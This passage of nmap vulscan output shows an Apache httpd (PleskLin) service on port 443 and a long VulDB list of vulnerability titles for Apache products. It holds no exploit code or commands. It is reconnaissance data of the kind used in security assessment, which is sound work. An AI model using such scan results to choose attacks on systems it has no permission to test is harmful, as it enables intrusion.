8949| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
8950| [562] Apache HTTP Server mod_info /server-info Information Disclosure
8951| [561] Apache Web Servers mod_status /server-status Information Disclosure
8952| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
8953| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
8954| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
8955| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
8956| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
8957| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
8958| [376] Apache Tomcat contextAdmin Arbitrary File Access
8959| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
8960| [222] Apache HTTP Server test-cgi Arbitrary File Access
8961| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
8962| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
8963|_
8964 443/tcp open ssl/http Apache httpd (PleskLin)
8965|_http-server-header: Apache
8966| vulscan: VulDB - https://vuldb.com:
8967| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
8968| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
8969| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
8970| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
8971| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
8972| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
8973| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
8974| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
8975| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
8976| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
8977| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
8978| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
8979| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
8980| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
8981| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
8982| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
8983| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
8984| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
8985| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
8986| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
8987| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
8988| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
8989| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
8990| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
8991| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
8992| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
8993| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
8994| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
8995| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
8996| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
8997| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
8998| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
8999| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
9000| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
9001| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
9002| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
9003| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
9004| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
9005| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
9006| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
9007| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
9008| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
9009| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
9010| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
9011| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
9012| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
9013| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
9014| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
9015| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
9016| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
9017| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
9018| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
9019| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
9020| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
9021| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
9022| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
9023| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
9024| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
9025| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
9026| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
9027| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
9028| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
9029| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
9030| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
9031| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
9032| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
9033| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
9034| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
9035| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
9036| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
9037| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
9038| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
9039| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
9040| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
9041| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
9042| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
9043| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
9044| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
9045| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
9046| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
9047| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
9048| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
9049| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
9050| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
9051| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
9052| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
9053| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
9054| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
9055| [136370] Apache Fineract up to 1.2.x sql injection
9056| [136369] Apache Fineract up to 1.2.x sql injection
9057| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
9058| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
9059| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
9060| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
9061| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
9062| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
9063| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
9064| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
9065| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
9066| [134416] Apache Sanselan 0.97-incubator Loop denial of service
9067| [134415] Apache Sanselan 0.97-incubator Hang denial of service
9068| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
9069| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
9070| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
9071| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
9072| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
9073| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
9074| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
9075| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
9076| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
9077| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
9078| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
9079| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
9080| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
9081| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
9082| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
9083| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
9084| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
9085| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
9086| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
9087| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
9088| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
9089| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
9090| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
9091| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
9092| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
9093| [131859] Apache Hadoop up to 2.9.1 privilege escalation
9094| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
9095| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
9096| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
9097| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
9098| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
9099| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
9100| [130629] Apache Guacamole Cookie Flag weak encryption
9101| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
9102| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
9103| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
9104| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
9105| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
9106| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
9107| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
9108| [130123] Apache Airflow up to 1.8.2 information disclosure
9109| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
9110| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
9111| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
9112| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
9113| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
9114| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
9115| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
9116| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
9117| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
9118| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
9119| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
9120| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
9121| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
9122| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
9123| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
9124| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
9125| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
9126| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
9127| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
9128| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
9129| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
9130| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
9131| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
9132| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
9133| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
9134| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
9135| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
9136| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
9137| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
9138| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
9139| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
9140| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
9141| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
9142| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
9143| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
9144| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
9145| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
9146| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
9147| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
9148| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
9149| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
9150| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
9151| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
9152| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
9153| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
9154| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
9155| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
9156| [127007] Apache Spark Request Code Execution
9157| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
9158| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
9159| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
9160| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
9161| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
9162| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
9163| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
9164| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
9165| [126346] Apache Tomcat Path privilege escalation
9166| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
9167| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
9168| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
9169| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
9170| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
9171| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
9172| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
| [123197] Apache Sentry up to 2.0.0 privilege escalation
| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
| [122800] Apache Spark 1.3.0 REST API weak authentication
| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
| [121354] Apache CouchDB HTTP API Code Execution
| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
| [120168] Apache CXF weak authentication
| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
| [119306] Apache MXNet Network Interface privilege escalation
| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
| [118143] Apache NiFi activemq-client Library Deserialization denial of service
| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
| [117115] Apache Tika up to 1.17 tika-server command injection
| [116929] Apache Fineract getReportType Parameter privilege escalation
| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
| [116926] Apache Fineract REST Parameter privilege escalation
| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
| [115883] Apache Hive up to 2.3.2 privilege escalation
| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
| [115518] Apache Ignite 2.3 Deserialization privilege escalation
| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
